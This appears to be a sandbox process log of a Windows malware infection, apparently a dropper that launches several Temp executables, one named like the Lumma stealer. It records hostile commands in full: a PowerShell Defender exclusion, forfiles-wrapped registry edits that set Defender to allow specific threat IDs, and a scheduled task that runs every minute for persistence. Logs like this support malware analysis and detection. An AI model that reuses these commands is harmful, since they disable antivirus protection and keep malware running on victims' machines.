33333.exe "C:\Users\test22\AppData\Local\Temp\1000004001\33333.exe"
2820fileosn.exe "C:\Users\test22\AppData\Local\Temp\1000005001\fileosn.exe"
2892lumma1234.exe "C:\Users\test22\AppData\Local\Temp\1000006001\lumma1234.exe"
2964gold.exe "C:\Users\test22\AppData\Local\Temp\1000008001\gold.exe"
3032swizzzz.exe "C:\Users\test22\AppData\Local\Temp\1000009001\swizzzz.exe"
2080powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Local\Temp\1000020001\file300un.exe" -Force
2308zB5wqyHN0DJjyQ0CADePMad2.exe C:\Users\test22\Documents\SimpleAdobe\zB5wqyHN0DJjyQ0CADePMad2.exe
3036RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3228cmd.exe "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
3504forfiles.exe forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
3540forfiles.exe forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
2136forfiles.exe forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
3996forfiles.exe forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
3732forfiles.exe forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
3280gpupdate.exe "C:\Windows\system32\gpupdate.exe" /force
1256schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN Newoff.exe /TR "C:\Users\test22\AppData\Local\Temp\1000031001\Newoff.exe" /F
1952FirstZ.exe "C:\Users\test22\AppData\Local\Temp\1000285001\FirstZ.exe"
2912explorer.exe C:\Windows\Explorer.EXE
1236360TS_Setup.exe "C:\Users\test22\Pictures\360TS_Setup.exe" /c:WW.Marketator.CPI20230405 /pmode:2 /s /promo:eyJib290dGltZSI6IjciLCJtZWRhbCI6IjciLCJuZXdzIjoiMCIsIm9wZXJhIjoiNyIsIm9wZXJhX2lucyI6IjAiLCJwb3B1cCI6IjciLCJyZW1pbmRlciI6IjciLCJ1cGdyYWRlX25vdyI6IjAifQo=
3184360TS_Setup.exe "C:\Program Files (x86)\1717128839_0\360TS_Setup.exe" /c:WW.Marketator.CPI20230405 /pmode:2 /s /promo:eyJib290dGltZSI6IjciLCJtZWRhbCI6IjciLCJuZXdzIjoiMCIsIm9wZXJhIjoiNyIsIm9wZXJhX2lucyI6IjAiLCJwb3B1cCI6IjciLCJyZW1pbmRlciI6IjciLCJ1cGdyYWRlX25vdyI6IjAifQo= /TSinstall
3780regsvr32.exe "C:\Windows\system32\regsvr32.exe" /s "C:\Program Files (x86)\360\Total Security\MenuEx64.dll"
3864regsvr32.exe /s "C:\Program Files (x86)\360\Total Security\MenuEx64.dll"
2172PowerSaver.exe "C:\Program Files (x86)\360\Total Security\Utils\PowerSaver.exe" /flightsigning
3376QHActiveDefense.exe "C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe" /install
2544